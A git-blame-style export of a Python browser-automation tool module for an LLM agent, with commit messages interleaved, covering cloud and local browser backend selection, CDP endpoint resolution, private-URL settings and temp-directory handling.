2026-01-29 06:10:24 +00:00
#!/usr/bin/env python3
"""
Browser Tool Module
2026-03-07 01:14:57 -08:00
This module provides browser automation tools using agent - browser CLI . It
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
supports multiple backends — * * Browser Use * * ( cloud , default for Nous
subscribers ) , * * Browserbase * * ( cloud , direct credentials ) , and * * local
Chromium * * — with identical agent - facing behaviour . The backend is
auto - detected from config and available credentials .
2026-01-29 06:10:24 +00:00
The tool uses agent - browser ' s accessibility tree (ariaSnapshot) for text-based
page representation , making it ideal for LLM agents without vision capabilities .
Features :
2026-03-07 01:14:57 -08:00
- * * Local mode * * ( default ) : zero - cost headless Chromium via agent - browser .
Works on Linux servers without a display . One - time setup :
` ` agent - browser install ` ` ( downloads Chromium ) or
` ` agent - browser install - - with - deps ` ` ( also installs system libraries for
Debian / Ubuntu / Docker ) .
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
- * * Cloud mode * * : Browserbase or Browser Use cloud execution when configured .
2026-01-29 06:10:24 +00:00
- Session isolation per task ID
- Text - based page snapshots using accessibility tree
- Element interaction via ref selectors ( @e1 , @e2 , etc . )
- Task - aware content extraction using LLM summarization
- Automatic cleanup of browser sessions
Environment Variables :
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
- BROWSERBASE_API_KEY : API key for direct Browserbase cloud mode
- BROWSERBASE_PROJECT_ID : Project ID for direct Browserbase cloud mode
- BROWSER_USE_API_KEY : API key for direct Browser Use cloud mode
2026-01-29 06:10:24 +00:00
- BROWSERBASE_PROXIES : Enable / disable residential proxies ( default : " true " )
- BROWSERBASE_ADVANCED_STEALTH : Enable advanced stealth mode with custom Chromium ,
requires Scale Plan ( default : " false " )
- BROWSERBASE_KEEP_ALIVE : Enable keepAlive for session reconnection after disconnects ,
requires paid plan ( default : " true " )
- BROWSERBASE_SESSION_TIMEOUT : Custom session timeout in milliseconds . Set to extend
beyond project default . Common values : 600000 ( 10 min ) , 1800000 ( 30 min ) ( default : none )
Usage :
from tools . browser_tool import browser_navigate , browser_snapshot , browser_click
# Navigate to a page
result = browser_navigate ( " https://example.com " , task_id = " task_123 " )
# Get page snapshot
snapshot = browser_snapshot ( task_id = " task_123 " )
# Click an element
browser_click ( " @e5 " , task_id = " task_123 " )
"""
import atexit
import json
2026-02-21 03:11:11 -08:00
import logging
2026-01-29 06:10:24 +00:00
import os
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
import re
2026-01-29 06:10:24 +00:00
import signal
import subprocess
import shutil
import sys
2026-02-09 04:35:25 +00:00
import tempfile
2026-01-31 21:42:15 -08:00
import threading
import time
2026-01-29 06:10:24 +00:00
import requests
from typing import Dict , Any , Optional , List
from pathlib import Path
2026-03-11 20:52:19 -07:00
from agent . auxiliary_client import call_llm
2026-04-03 21:50:59 +03:00
from hermes_constants import get_hermes_home
2026-03-17 03:11:21 -07:00
try :
from tools . website_policy import check_website_access
except Exception :
check_website_access = lambda url : None # noqa: E731 — fail-open if policy module unavailable
2026-03-25 15:16:57 -07:00
try :
from tools . url_safety import is_safe_url as _is_safe_url
except Exception :
_is_safe_url = lambda url : False # noqa: E731 — fail-closed: block all if safety module unavailable
2026-03-17 00:16:34 -07:00
from tools . browser_providers . base import CloudBrowserProvider
from tools . browser_providers . browserbase import BrowserbaseProvider
from tools . browser_providers . browser_use import BrowserUseProvider
2026-04-06 14:05:26 -07:00
from tools . browser_providers . firecrawl import FirecrawlProvider
2026-03-26 15:27:27 -07:00
from tools . tool_backend_helpers import normalize_browser_cloud_provider
2026-01-29 06:10:24 +00:00
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
# Camofox local anti-detection browser backend (optional).
# When CAMOFOX_URL is set, all browser operations route through the
# camofox REST API instead of the agent-browser CLI.
try :
from tools . browser_camofox import is_camofox_mode as _is_camofox_mode
except ImportError :
_is_camofox_mode = lambda : False # noqa: E731
2026-02-21 03:11:11 -08:00
logger = logging . getLogger ( __name__ )
2026-03-23 22:45:55 -07:00
# Standard PATH entries for environments with minimal PATH (e.g. systemd services).
# Includes macOS Homebrew paths (/opt/homebrew/* for Apple Silicon).
_SANE_PATH = (
" /opt/homebrew/bin:/opt/homebrew/sbin: "
" /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin "
)
def _discover_homebrew_node_dirs ( ) - > list [ str ] :
""" Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24).
When Node is installed via ` ` brew install node @ 24 ` ` and NOT linked into
/ opt / homebrew / bin , the binary lives only in / opt / homebrew / opt / node @ 24 / bin / .
This function discovers those paths so they can be added to subprocess PATH .
"""
dirs : list [ str ] = [ ]
homebrew_opt = " /opt/homebrew/opt "
if not os . path . isdir ( homebrew_opt ) :
return dirs
try :
for entry in os . listdir ( homebrew_opt ) :
if entry . startswith ( " node " ) and entry != " node " :
# e.g. node@20, node@24
bin_dir = os . path . join ( homebrew_opt , entry , " bin " )
if os . path . isdir ( bin_dir ) :
dirs . append ( bin_dir )
except OSError :
pass
return dirs
2026-03-14 02:56:06 -07:00
# Throttle screenshot cleanup to avoid repeated full directory scans.
_last_screenshot_cleanup_by_dir : dict [ str , float ] = { }
2026-01-29 06:10:24 +00:00
# ============================================================================
# Configuration
# ============================================================================
# Default timeout for browser commands (seconds)
DEFAULT_COMMAND_TIMEOUT = 30
# Default session timeout (seconds)
DEFAULT_SESSION_TIMEOUT = 300
# Max tokens for snapshot content before summarization
SNAPSHOT_SUMMARIZE_THRESHOLD = 8000
2026-03-07 08:52:06 -08:00
2026-03-24 07:21:50 -07:00
def _get_command_timeout ( ) - > int :
""" Return the configured browser command timeout from config.yaml.
Reads ` ` config [ " browser " ] [ " command_timeout " ] ` ` and falls back to
` ` DEFAULT_COMMAND_TIMEOUT ` ` ( 30 s ) if unset or unreadable .
"""
try :
2026-04-07 17:28:04 -07:00
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
val = cfg . get ( " browser " , { } ) . get ( " command_timeout " )
if val is not None :
return max ( int ( val ) , 5 ) # Floor at 5s to avoid instant kills
2026-03-24 07:21:50 -07:00
except Exception as e :
logger . debug ( " Could not read command_timeout from config: %s " , e )
return DEFAULT_COMMAND_TIMEOUT
2026-03-11 20:52:19 -07:00
def _get_vision_model ( ) - > Optional [ str ] :
2026-03-07 08:52:06 -08:00
""" Model for browser_vision (screenshot analysis — multimodal). """
2026-03-11 20:52:19 -07:00
return os . getenv ( " AUXILIARY_VISION_MODEL " , " " ) . strip ( ) or None
2026-03-07 08:52:06 -08:00
2026-03-11 20:52:19 -07:00
def _get_extraction_model ( ) - > Optional [ str ] :
2026-03-07 08:52:06 -08:00
""" Model for page snapshot text summarization — same as web_extract. """
2026-03-11 20:52:19 -07:00
return os . getenv ( " AUXILIARY_WEB_EXTRACT_MODEL " , " " ) . strip ( ) or None
2026-01-29 06:10:24 +00:00
2026-03-07 01:14:57 -08:00
2026-03-19 14:06:49 +00:00
def _resolve_cdp_override ( cdp_url : str ) - > str :
""" Normalize a user-supplied CDP endpoint into a concrete connectable URL.
Accepts :
- full websocket endpoints : ws : / / host : port / devtools / browser / . . .
- HTTP discovery endpoints : http : / / host : port or http : / / host : port / json / version
- bare websocket host : port values like ws : / / host : port
For discovery - style endpoints we fetch / json / version and return the
webSocketDebuggerUrl so downstream tools always receive a concrete browser
websocket instead of an ambiguous host : port URL .
"""
raw = ( cdp_url or " " ) . strip ( )
if not raw :
return " "
lowered = raw . lower ( )
if " /devtools/browser/ " in lowered :
return raw
discovery_url = raw
refactor: codebase-wide lint cleanup — unused imports, dead code, and inefficient patterns (#5821)
Comprehensive cleanup across 80 files based on automated (ruff, pyflakes, vulture)
and manual analysis of the entire codebase.
Changes by category:
Unused imports removed (~95 across 55 files):
- Removed genuinely unused imports from all major subsystems
- agent/, hermes_cli/, tools/, gateway/, plugins/, cron/
- Includes imports in try/except blocks that were truly unused
(vs availability checks which were left alone)
Unused variables removed (~25):
- Removed dead variables: connected, inner, channels, last_exc,
source, new_server_names, verify, pconfig, default_terminal,
result, pending_handled, temperature, loop
- Dropped unused argparse subparser assignments in hermes_cli/main.py
(12 instances of add_parser() where result was never used)
Dead code removed:
- run_agent.py: Removed dead ternary (None if False else None) and
surrounding unreachable branch in identity fallback
- run_agent.py: Removed write-only attribute _last_reported_tool
- hermes_cli/providers.py: Removed dead @property decorator on
module-level function (decorator has no effect outside a class)
- gateway/run.py: Removed unused MCP config load before reconnect
- gateway/platforms/slack.py: Removed dead SessionSource construction
Undefined name bugs fixed (would cause NameError at runtime):
- batch_runner.py: Added missing logger = logging.getLogger(__name__)
- tools/environments/daytona.py: Added missing Dict and Path imports
Unnecessary global statements removed (14):
- tools/terminal_tool.py: 5 functions declared global for dicts
they only mutated via .pop()/[key]=value (no rebinding)
- tools/browser_tool.py: cleanup thread loop only reads flag
- tools/rl_training_tool.py: 4 functions only do dict mutations
- tools/mcp_oauth.py: only reads the global
- hermes_time.py: only reads cached values
Inefficient patterns fixed:
- startswith/endswith tuple form: 15 instances of
x.startswith('a') or x.startswith('b') consolidated to
x.startswith(('a', 'b'))
- len(x)==0 / len(x)>0: 13 instances replaced with pythonic
truthiness checks (not x / bool(x))
- in dict.keys(): 5 instances simplified to in dict
- Redefined unused name: removed duplicate _strip_mdv2 import in
send_message_tool.py
Other fixes:
- hermes_cli/doctor.py: Replaced undefined logger.debug() with pass
- hermes_cli/config.py: Consolidated chained .endswith() calls
Test results: 3934 passed, 17 failed (all pre-existing on main),
19 skipped. Zero regressions.
2026-04-07 10:25:31 -07:00
if lowered . startswith ( ( " ws:// " , " wss:// " ) ) :
2026-03-19 14:06:49 +00:00
if raw . count ( " : " ) == 2 and raw . rstrip ( " / " ) . rsplit ( " : " , 1 ) [ - 1 ] . isdigit ( ) and " / " not in raw . split ( " : " , 2 ) [ - 1 ] :
discovery_url = ( " http:// " if lowered . startswith ( " ws:// " ) else " https:// " ) + raw . split ( " :// " , 1 ) [ 1 ]
else :
return raw
if discovery_url . lower ( ) . endswith ( " /json/version " ) :
version_url = discovery_url
else :
version_url = discovery_url . rstrip ( " / " ) + " /json/version "
try :
response = requests . get ( version_url , timeout = 10 )
response . raise_for_status ( )
payload = response . json ( )
except Exception as exc :
logger . warning ( " Failed to resolve CDP endpoint %s via %s : %s " , raw , version_url , exc )
return raw
ws_url = str ( payload . get ( " webSocketDebuggerUrl " ) or " " ) . strip ( )
if ws_url :
logger . info ( " Resolved CDP endpoint %s -> %s " , raw , ws_url )
return ws_url
logger . warning ( " CDP discovery at %s did not return webSocketDebuggerUrl; using raw endpoint " , version_url )
return raw
2026-03-16 06:38:20 -07:00
def _get_cdp_override ( ) - > str :
2026-03-19 14:06:49 +00:00
""" Return a normalized user-supplied CDP URL override, or empty string.
2026-03-16 06:38:20 -07:00
When ` ` BROWSER_CDP_URL ` ` is set ( e . g . via ` ` / browser connect ` ` ) , we skip
both Browserbase and the local headless launcher and connect directly to
the supplied Chrome DevTools Protocol endpoint .
"""
2026-03-19 14:06:49 +00:00
return _resolve_cdp_override ( os . environ . get ( " BROWSER_CDP_URL " , " " ) )
2026-03-16 06:38:20 -07:00
2026-03-17 00:16:34 -07:00
# ============================================================================
# Cloud Provider Registry
# ============================================================================
_PROVIDER_REGISTRY : Dict [ str , type ] = {
" browserbase " : BrowserbaseProvider ,
" browser-use " : BrowserUseProvider ,
2026-04-06 14:05:26 -07:00
" firecrawl " : FirecrawlProvider ,
2026-03-17 00:16:34 -07:00
}
_cached_cloud_provider : Optional [ CloudBrowserProvider ] = None
_cloud_provider_resolved = False
2026-03-31 11:11:55 +02:00
_allow_private_urls_resolved = False
2026-03-31 03:16:40 -07:00
_cached_allow_private_urls : Optional [ bool ] = None
2026-03-17 00:16:34 -07:00
def _get_cloud_provider ( ) - > Optional [ CloudBrowserProvider ] :
""" Return the configured cloud browser provider, or None for local mode.
2026-03-07 01:14:57 -08:00
2026-03-17 00:16:34 -07:00
Reads ` ` config [ " browser " ] [ " cloud_provider " ] ` ` once and caches the result
2026-03-26 15:27:27 -07:00
for the process lifetime . An explicit ` ` local ` ` provider disables cloud
fallback . If unset , fall back to Browserbase when direct or managed
Browserbase credentials are available .
2026-03-07 01:14:57 -08:00
"""
2026-03-17 00:16:34 -07:00
global _cached_cloud_provider , _cloud_provider_resolved
if _cloud_provider_resolved :
return _cached_cloud_provider
_cloud_provider_resolved = True
try :
2026-04-07 17:28:04 -07:00
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
browser_cfg = cfg . get ( " browser " , { } )
provider_key = None
if isinstance ( browser_cfg , dict ) and " cloud_provider " in browser_cfg :
provider_key = normalize_browser_cloud_provider (
browser_cfg . get ( " cloud_provider " )
)
if provider_key == " local " :
_cached_cloud_provider = None
return None
if provider_key and provider_key in _PROVIDER_REGISTRY :
_cached_cloud_provider = _PROVIDER_REGISTRY [ provider_key ] ( )
2026-03-17 00:16:34 -07:00
except Exception as e :
logger . debug ( " Could not read cloud_provider from config: %s " , e )
2026-03-26 15:27:27 -07:00
if _cached_cloud_provider is None :
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
# Prefer Browser Use (managed Nous gateway or direct API key),
# fall back to Browserbase (direct credentials only).
fallback_provider = BrowserUseProvider ( )
2026-03-26 15:27:27 -07:00
if fallback_provider . is_configured ( ) :
_cached_cloud_provider = fallback_provider
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
else :
fallback_provider = BrowserbaseProvider ( )
if fallback_provider . is_configured ( ) :
_cached_cloud_provider = fallback_provider
2026-03-26 15:27:27 -07:00
2026-03-17 00:16:34 -07:00
return _cached_cloud_provider
2026-03-07 01:14:57 -08:00
2026-03-26 15:27:27 -07:00
def _is_local_mode ( ) - > bool :
""" Return True when the browser tool will use a local browser backend. """
if _get_cdp_override ( ) :
return False
return _get_cloud_provider ( ) is None
2026-03-31 10:40:13 -07:00
def _is_local_backend ( ) - > bool :
""" Return True when the browser runs locally (no cloud provider).
SSRF protection is only meaningful for cloud backends ( Browserbase ,
BrowserUse ) where the agent could reach internal resources on a remote
machine . For local backends — Camofox , or the built - in headless
Chromium without a cloud provider — the user already has full terminal
and network access on the same machine , so the check adds no security
value .
"""
return _is_camofox_mode ( ) or _get_cloud_provider ( ) is None
2026-03-31 11:11:55 +02:00
def _allow_private_urls ( ) - > bool :
""" Return whether the browser is allowed to navigate to private/internal addresses.
Reads ` ` config [ " browser " ] [ " allow_private_urls " ] ` ` once and caches the result
for the process lifetime . Defaults to ` ` False ` ` ( SSRF protection active ) .
"""
2026-03-31 03:16:40 -07:00
global _cached_allow_private_urls , _allow_private_urls_resolved
2026-03-31 11:11:55 +02:00
if _allow_private_urls_resolved :
2026-03-31 03:16:40 -07:00
return _cached_allow_private_urls
2026-03-31 11:11:55 +02:00
_allow_private_urls_resolved = True
2026-03-31 03:16:40 -07:00
_cached_allow_private_urls = False # safe default
2026-03-31 11:11:55 +02:00
try :
2026-04-07 17:28:04 -07:00
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
_cached_allow_private_urls = bool ( cfg . get ( " browser " , { } ) . get ( " allow_private_urls " ) )
2026-03-31 11:11:55 +02:00
except Exception as e :
logger . debug ( " Could not read allow_private_urls from config: %s " , e )
2026-03-31 03:16:40 -07:00
return _cached_allow_private_urls
2026-03-31 11:11:55 +02:00
2026-03-08 19:31:23 -07:00
def _socket_safe_tmpdir ( ) - > str :
""" Return a short temp directory path suitable for Unix domain sockets.
macOS sets ` ` TMPDIR ` ` to ` ` / var / folders / xx / . . . / T / ` ` ( ~ 51 chars ) . When we
append ` ` agent - browser - hermes_ … ` ` the resulting socket path exceeds the
104 - byte macOS limit for ` ` AF_UNIX ` ` addresses , causing agent - browser to
fail with " Failed to create socket directory " or silent screenshot failures .
Linux ` ` tempfile . gettempdir ( ) ` ` already returns ` ` / tmp ` ` , so this is a
no - op there . On macOS we bypass ` ` TMPDIR ` ` and use ` ` / tmp ` ` directly
( symlink to ` ` / private / tmp ` ` , sticky - bit protected , always available ) .
"""
if sys . platform == " darwin " :
return " /tmp "
return tempfile . gettempdir ( )
2026-01-29 06:10:24 +00:00
